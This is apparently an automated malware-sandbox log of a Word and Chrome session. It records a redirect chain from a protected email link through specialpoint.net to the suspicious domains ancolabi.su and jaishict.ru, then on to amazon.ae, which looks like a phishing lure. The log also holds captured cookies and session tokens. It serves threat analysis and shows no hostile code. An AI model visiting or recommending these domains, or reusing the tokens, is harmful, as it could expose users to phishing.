Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49743 version: TLS 1.0
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 52.123.243.83:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49866 version: TLS 1.2
Source: winword.exeMemory has grown: Private usage: 1MB later: 100MB
Source: unknownNetwork traffic detected: DNS query count 70
Source: unknownNetwork traffic detected: IP country count 10
Source: global trafficTCP traffic: 192.168.2.4:49819 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.4:50317 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: redirect.aecdaily.com to https://url.us.m.mimecastprotect.com/s/m5bmckro7zhg7kgzf23i6c?domain=d2e4wd34e3e
Source: Joe Sandbox ViewIP Address: 34.160.236.64 34.160.236.64
Source: Joe Sandbox ViewIP Address: 77.243.51.121 77.243.51.121
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49743 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.73
Source: global trafficHTTP traffic detected: GET /config/v2/Office/word/16.0.16827.20130/Production/CC?&EcsCanary=1&Clientid=%7b7423E565-A626-48D4-A186-93E31FBB3F25%7d&Application=word&Platform=win32&Version=16.0.16827.20130&MsoVersion=16.0.16827.20130&ProcessName=winword.exe&Audience=Production&Build=ship&Architecture=x86&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=7&LicenseSKU=ProPlus2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7bE525282F-F148-49F6-8DDB-A7A3A7208FEF%7d&LabMachine=false HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipIf-None-Match: ""User-Agent: Microsoft Office 2014DisableExperiments: falseX-ECS-Client-Last-Telemetry-Events: ecs_client_library_name=MSO,ecs_client_app_name=Office,ecs_client_version=16.0.16827.20130Host: ecs.office.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kl2U8yuCv7Zo65W&MD=b5mTn25W HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /s1/url.us.m.mimecastprotect.com/s/M5BmCkRO7zHg7kGZf23i6C?domain=d2e4wd34e3e HTTP/1.1Host: redirect.aecdaily.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/M5BmCkRO7zHg7kGZf23i6C?domain=d2e4wd34e3e HTTP/1.1Host: url.us.m.mimecastprotect.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r/CAzbxzXu31luj1VP7l1qJ00_Lfa9N-92qS7YYGQxb2X6YN3eQw_zNwjneYru5HBU6SL2Hi7fsPA_vNHCMS7ShHe3S-OjTlpXELOr6CFNPyQBmF5CDDL9yZ4Y96M7ME3y63zc-a27ffhGf9MokvM4QsS20uxB2QmKH-bGUo8BgMAslyYsN3JERfH-cyEoV4KGgFEm-6pXQl3f9IKxRqhylB-hn4heSneIp9fyO4uA8iOOEFednAqCL2JXIKlyvymXUi3oo1nCVTD1PcEmYZq3LYd3ssMz3_Q_JK-sNgun-2Y-0G02lpszM2y4H4MgX_FyHGsGfwtpQx4g71lwOFTzhvVymcCGIxvN74X3d7tqx7YuS0O_pje6-FHKyFr74AikZqJ0u_5x-jEprLVXajzIDP2ZdNnwI7jfdbCEwyPctM4wjUCgFe0_bGMZ9DnOi0WMZxzw2GL3zX_2N8nuW6TEtUImkxe8Wmivg84Fj710qVb0_nBpXA_Jh6WgSaGqGwKXXoS6CNW3dWWDnhCuj4BP6JWYzgpiEf377I2H-fubIzY15fw2lBwFIZ6h13yh0wEzdG-ZfC7tH18VkhgGeOxXJI7h0C2QeO2zco1w44t9_lUjenZooeDLAJObxtijSIaWfVVVFILDAYpwhoiobjh3zTD0pmoQ0FgdNKNOa9DR8BjMCNbQrozxyidLn9hbo91_xr65xqvfau1zydbxyLkPVwrfIGyxRsKmvwuOIBMfnH0RWYKejDfAa4ec6Wir12ZPpbvWKNjk5o82Om2N6Ox5XyWIeeYjeOwaZW3gF3gGjKo5EeBxxOF9XmOc_R2IklQbJhXkxF7BQe8kTULWO8pnLmGmmexdn-LD8peE1yDbAWQddyYC8GdPL5ifkgqyoRLqlYIDkdYd_dQTow2ia8-_cDASB_yl6fs7McUCFsWglKJSVvc9Y2sHnxM4NA1GOGUOF0eIayqvRx03UTwkiLaGfquV79A1uS1bRlxLyZ08_xd_x5HiOmQR0z-gFj8Z5t1HjYFbeMPC8e4WXi27GInvOAMUxGllUrYxiK3vXeHrW1lAUPtJiBfnMJaNejCWcBvvRZbD0mKMJEJ4R_EqAovwpEaNfeamCYUWFtiXiano8eDaVJMmtNBObcKzYYWQFX5GLnHfoKxIBFIbnAZTkRs3x-vydFXPwC76x_l5a7QPLWe9lZi165Rqucvdji6Hf4jre6D4AygdTlSJtFC1KcO-AWdMAXAArGwkoo5DBp_95NQAlYPF85TAR4WyZxMbey0I_HMuLEZ5ulEMw4Lyso5aq7ZlvM0Wf7yY_vo-HjFhL9catoA8ohAV1crhNR0BuUYue5fgwSIATDtOSTFmag-iVb7m3GS_vEmgWCcb6mgO0Lyaymp5dVRCGP4cKY0uTEHjpgNgsLZtglDirhFyES7pVUEo213WnJNQp24PyGdZVji34_5YGIuVa5Zm_fiOa9xruYKWkRQ5G2Q3ye8PeugPfEQOV_9NlFh0ctWWCKbBLCGLzm9vMrdkbSpXrTTqWAxwUh63TG5NUcXdAoJQFL8-R74Ay7fcTE6j0NshGELh4HOW6eobaoOPgAL04poHuSuW5Sj-iBQAYFLzLccx7GE1UdNrNMA9LuvJ5qK6sZp-1TdRmFZtwNCKdeuEQm4AYuErl8RMcELrfLlNC9PJuOOucFeG1szbHGR_283LQaevWhYzn6HzDzkeVrk1b8bRbBo6VUUz6sxYHwbgdLBcXIHvO9F0DDvLgyTRACQW_Dz7pTF5ndcuEmunTNOS-qRoWPn-qXAYltAgCmnzG9ttwjFs0gnOGOPG-O2jexTIT8GjLf6_3qRSrz3vjFZe4IFffRBlB7H3mdIrqf0YWBUVyA_BIvURCd3DB8f_bQM9sS-_TG0pG9BqkT3pyDm7jdxP6Xviw3XrmiIdGqp3KLdcN3P3U2BlUGmd0J-PQrHvTtA5a4O9kNOUjbkxLqmMa-qHAlW-rjI6X6y5kHLwy7BL9KtB0BjwQcU3sL7HMOQuK_b5It9A88kT2mlBuJKYd_T8BagjQkzPrwU31yxuc0dSOBrjGvgOaVdW5W9esIZC_nCj8gDO1EUmyoFkhhnI1CM-vm3cA2Ivo1bPSqLtFu70rEPBfoPLU94TjxL00nsvMZ1SovUvdWNX3uegFvnnZPqMwMrX HTTP/1.1Host: url.us.m.mimecastprotect.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: specialpoint.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://url6.mailanyone.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: specialpoint.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://specialpoint.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; _HFN_Wm0L5Mhhqk1oFNnI8cYVYc=1723468998; 8xSp-vytl8r8hR9WfQ4I6DyfqXs=1723555398; GHwRErz7w44NUJIP52zhojU3tp0=dxTf3kwwFhmU3kprsXZOOH7Q8OI
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: specialpoint.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/769ce3c24a3b/main.js? HTTP/1.1Host: specialpoint.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; _HFN_Wm0L5Mhhqk1oFNnI8cYVYc=1723468998; 8xSp-vytl8r8hR9WfQ4I6DyfqXs=1723555398; GHwRErz7w44NUJIP52zhojU3tp0=dxTf3kwwFhmU3kprsXZOOH7Q8OI
Source: global trafficHTTP traffic detected: GET /YOBEzWvY/ HTTP/1.1Host: nkoc4.ancolabi.suConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://specialpoint.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/769ce3c24a3b/main.js? HTTP/1.1Host: specialpoint.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; _HFN_Wm0L5Mhhqk1oFNnI8cYVYc=1723468998; 8xSp-vytl8r8hR9WfQ4I6DyfqXs=1723555398; GHwRErz7w44NUJIP52zhojU3tp0=dxTf3kwwFhmU3kprsXZOOH7Q8OI
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/8b20c7739b2319b2 HTTP/1.1Host: specialpoint.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; _HFN_Wm0L5Mhhqk1oFNnI8cYVYc=1723468998; 8xSp-vytl8r8hR9WfQ4I6DyfqXs=1723555398; GHwRErz7w44NUJIP52zhojU3tp0=dxTf3kwwFhmU3kprsXZOOH7Q8OI
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: nkoc4.ancolabi.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://nkoc4.ancolabi.su/YOBEzWvY/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlKcUlyckxIYVJReWdiaU9neFg5RlE9PSIsInZhbHVlIjoicEhNZUsvNE0xK2NEbWpTRG41YTJ3c2ZsZFU5dmtxQkc1WEZpc0JTdzVqajVxblIvYlo4Z0V1M3lsbnFsdENyTXRCNmZ4N3pSQXpzWWpEWVVyUUxtRGxGTzV2ZERYU2gyeTV4YUYvMEdpMTd4aHRnbU4xUG4vdjB6a1UxdzVCeTUiLCJtYWMiOiJiMjhiZjVjZWJlMGE4NDYwYTNhOWUzMWM1ZTI2MzMxODc1NWJkNzYzNzlmOTMzMWUxMzIxZWNjZjI3Y2I3MTY5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5RYitvVmt3RzcyaVhpckRKckxmR2c9PSIsInZhbHVlIjoiaDBwS2dJbkxOMmduaEt6TVFUaHdWRjk1Y1Q3d3llUm1vSUlxZm1leGkvYUdPWGdvRkpOcmdWK0N1NnZiRGFJMUp6VERkNktSZGVmbk9DclhxRCtVeC9adW1qeG45bms1U1A4VjVGL1lZaUxQWnI4QmlrMWVGSDFZaWFnNDRDVEoiLCJtYWMiOiIzMTU0ODFiZWNmNzMyODFiNzY4ODU0ZjJhNTE0MTNkODA5OTljNmQ2M2M5NGZjMDYxOWFjNzE5NmU5ZjNlYmEzIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /pitpuuzhnmxqkshihrkpdjjmzyQNhrLDWZIJAADSBTPAPAJPLCDIIUZ HTTP/1.1Host: iic.jaishict.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://nkoc4.ancolabi.suSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://nkoc4.ancolabi.su/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pitpuuzhnmxqkshihrkpdjjmzyQNhrLDWZIJAADSBTPAPAJPLCDIIUZ HTTP/1.1Host: iic.jaishict.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://nkoc4.ancolabi.su/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41-WpIOxHtL._RC%7C71S7yoZEbpL.css,415rb7zC-GL.css,11GB7tDtz6L.css,31MqpFX13CL.css,31YZpDCYJPL.css,21pkK7OQMnL.css,41Xj8tZc2XL.css,110Nj+wUGYL.css,31OvHRW+XiL.css,01R53xsjpjL.css,11EKggV-DlL.css,415g7iDx4VL.css,11qTzxZ0Y5L.css_.css?AUIClients/NavDesktopUberAsset&JoiNCr6G HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41945FR1dZL.css?AUIClients/AmazonGatewayAuiAssets&IaVMOKWd HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,3137XxvMS8L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11vQ-WiqGQL.css,01QhqFH8I8L.css,21Ol27dM9tL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,012f1fcyibL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&zH5KQLF9 HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
